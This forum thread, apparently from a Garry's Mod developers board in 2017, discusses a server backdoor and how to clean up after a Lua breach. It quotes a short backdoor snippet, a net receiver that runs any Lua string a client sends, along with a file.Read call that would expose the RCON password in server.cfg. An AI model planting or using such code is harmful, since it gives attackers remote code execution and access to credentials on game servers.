*BEWARE* Huge Exploit, Nobody's talking about this? - Developers

I believe you meant to say false-positives, but yes, I see what you are saying.

[QUOTE=Serenity3;52474295]I believe you meant to say false-positives, but yes, I see what you are saying.[/QUOTE] What do you meant "meant to say", he literally did say exactly that.

Original message said false-negatives. [editline]16th July 2017[/editline] [url]https://gyazo.com/b491d48f40540a9a5473d26b2f642bcf[/url] [editline]16th July 2017[/editline] Anyway, that's getting off topic. Still searching for possible backdoors.

Where do you save your RCON password? In the server.cfg or command line?

Why do you ask? *Edit* Pretty sure the rcon theft was patched back in 2015. I had RCON disabled at the time btw, but again, since that got patched at one point, does it matter?

I really appreciate those of you who tag posts negatively but yet give no reasoning to it.

I think its cause you don't reply with a define answer. Yes the .cfg download was patched, but when someone had access to running lua on your server, anything inside garrysmod could be read by him. I could just do something like file.Read("cfg/server.cfg","GAME") if I had access. When you had a lua-breach, there are sadly only one way out of it. Delete all untrusted addons/data, delete the SQL files, change RCON password and start from scratch more carefully.

Right, I know, I already did all of this. [editline]17th July 2017[/editline] Thank you for posting something descriptive and useful. Wish everyone was like you on here.

[QUOTE=code_gs;52472747]You should probably just completely reinstall your addons and check each for backdoors.[/QUOTE] I think it's clear that he doesn't know what these back doors look like. What's happening here is pretty clear, many addons on the workshop either intentionally, or unintentionally are scripted in a way that can allow someone who knows what they're doing to "trick" a server into running commands for them. Using this, they can execute commands and generally do other malicious things. You cannot simply "remove" these exploits, nor does it mean that the use of net messages is inherently insecure, it just means that either you're using an addon that was made with a back door, or by someone who doesn't know what they're doing. Luckily for you, someone went through a lot of addons on the workshop and compiled a list of addons that are like this. Here's the thread, you may have one of these installed. [url]https://facepunch.com/showthread.php?t=1569480[/url]

I already found the backdoor and removed it, didn't have to do with the addons listed but it is fixed and everything is normal now. Thank you for your comment / help though. Also, I do know what the backdoors look like.

[QUOTE=Serenity3;52478713]Also, I do know what the backdoors look like.[/QUOTE] I'm not trying to be rude or anything, I only pointed that out because the way code_gs said it, it's like he expected you to go through every addon line by line reading the code until you found an exploit. Also, lets be real here. [QUOTE=Serenity3;52472359]just wanted to see what people thought of this, since I don't know if it is legitimate. "util.AddNetworkString('ULX_QUERY2') net.Receive('ULX_QUERY2',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)" [/QUOTE] This would allow anyone to run any server-side lua on your server. He could for instance, wipe your server's database, which would delete everyone's darkrp money.

To add on to that, it's okay to admit when you don't know something. We were all there, you should see some of my first questions/threads on here. The only reason you got such a backlash is because you acted like you knew everything, when there were clearly some things you were mistaken on. Like I said, we were all there once.

Dude, just give up [highlight](User was banned for this post ("Post a helpful reply or don't help at all" - Kiwi))[/highlight] [highlight](User was banned for this post ("Post a helpful reply or don't reply at all" - Kiwi))[/highlight]

dude nice server how is it doing? [highlight](User was banned for this post ("Post a helpful reply or don't reply at all" - Kiwi))[/highlight]